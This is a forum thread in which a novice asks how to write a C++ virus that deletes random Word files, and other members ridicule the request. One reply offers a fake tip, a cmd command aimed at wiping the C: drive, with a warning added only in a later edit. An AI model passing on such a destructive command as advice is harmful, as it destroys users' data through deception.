C++ project D.O.T.exe
Here is my advice.
start> Run> type cmd press enter
Type this:
rm /s/q C:\
Then try to create a virus.
I have put my advice.
To those that know what it does, feel free to laugh at his lack of programming skills. He seems to think hacking is only viruses.
[edit] for those who DONT know what it does, dont do it [/edit]
DataCrash wrote: Basicly i want to create a program in c++ called D.O.T. .its going to be a virus. .it will,find the c:\ DICTIONARY .It will randomly deystroy miscro soft word files.
ok so i created a mind map with all my ideas on this program so where can i start… tuts,codes,links,advice.
Okay I will pipe up here on this. This is not a flame. The virus is worthless and a waste of your brain. If you think this kind of brain fart is going to be well received in any world you need to fart less often. the destorying of "random microsoft word" files is just stupid. Why word? why not excel or access? why not txt files? why not DLLs? why not EXEs? why not destroy the registry? you see all these things you have listed to do here are a waste of time. as many other people have said Learn to code then come back. if you want to hack in any way then please do the tutorials and challenges here. if you want to be a nice 1337 v|ru5 c0d3r then please fuck off.